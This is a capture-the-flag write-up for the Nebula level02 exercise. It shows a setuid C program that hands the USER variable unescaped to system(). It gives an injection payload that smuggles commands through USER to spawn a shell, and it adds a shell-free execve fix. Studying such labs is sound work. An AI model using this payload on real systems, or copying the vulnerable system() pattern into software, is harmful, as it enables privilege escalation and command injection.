ExploitExercises_Nebula_Level02
Source: Internet  Published: 素材软件  Editor: 程序博客网  Time: 2024/04/19 08:17
Challenge source code:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;
  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);

  system(buffer);
}
Running /home/flag02/flag02 prints:
about to call system("/bin/echo level02 is cool")
level02 is cool
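The program copies the USER environment variable into the command string unescaped, and system() passes that string to /bin/sh. To make system() execute a shell, tamper with USER:
export USER='-e "/bin/bash" > /tmp/abc; chmod +x /tmp/abc; /tmp/abc'
buffer then becomes:
/bin/echo -e "/bin/bash" > /tmp/abc; chmod +x /tmp/abc; /tmp/abc is cool
Then run the program, and the shell is executed.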
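The root cause is that USER reaches system(), which hands the whole string to /bin/sh for parsing. The following added example (not part of the original post or the Nebula source) produces the same output without a shell; `echo_no_shell` is a hypothetical helper name, and the 256-byte message limit and the empty child environment are choices made for this sketch.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* echo_no_shell() is a hypothetical helper, not part of the Nebula source.
 * It runs /bin/echo directly with "<user> is cool" as ONE argv entry, so
 * ';', '>' and quotes in USER are printed as data instead of parsed by sh.
 * Child stdout is captured in out. Returns the exit status, -1 on error. */
int echo_no_shell(const char *user, char *out, size_t outlen)
{
    char msg[256];
    int fds[2], status, len;
    size_t n = 0;
    ssize_t r;

    if (user == NULL || outlen == 0)
        return -1;
    len = snprintf(msg, sizeof msg, "%s is cool", user);
    if (len < 0 || (size_t)len >= sizeof msg || pipe(fds) < 0)
        return -1;                       /* over-long USER or no pipe */
    pid_t pid = fork();
    if (pid == 0) {                      /* child: exec without a shell */
        char *argv[] = { "/bin/echo", msg, NULL };
        char *envp[] = { NULL };         /* empty environment for the child */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execve("/bin/echo", argv, envp); /* absolute path, no PATH lookup */
        _exit(127);
    }
    close(fds[1]);
    while (pid > 0 && n < outlen - 1 && (r = read(fds[0], out + n, outlen - 1 - n)) > 0)
        n += (size_t)r;
    out[n] = '\0';
    close(fds[0]);
    if (pid < 0 || waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char out[512];
    int rc = echo_no_shell(getenv("USER"), out, sizeof out);
    if (rc == 0) fputs(out, stdout);
    return rc == 0 ? 0 : 1;
}
```

With USER set to a string containing shell metacharacters, the program prints that string literally followed by " is cool" and runs nothing else.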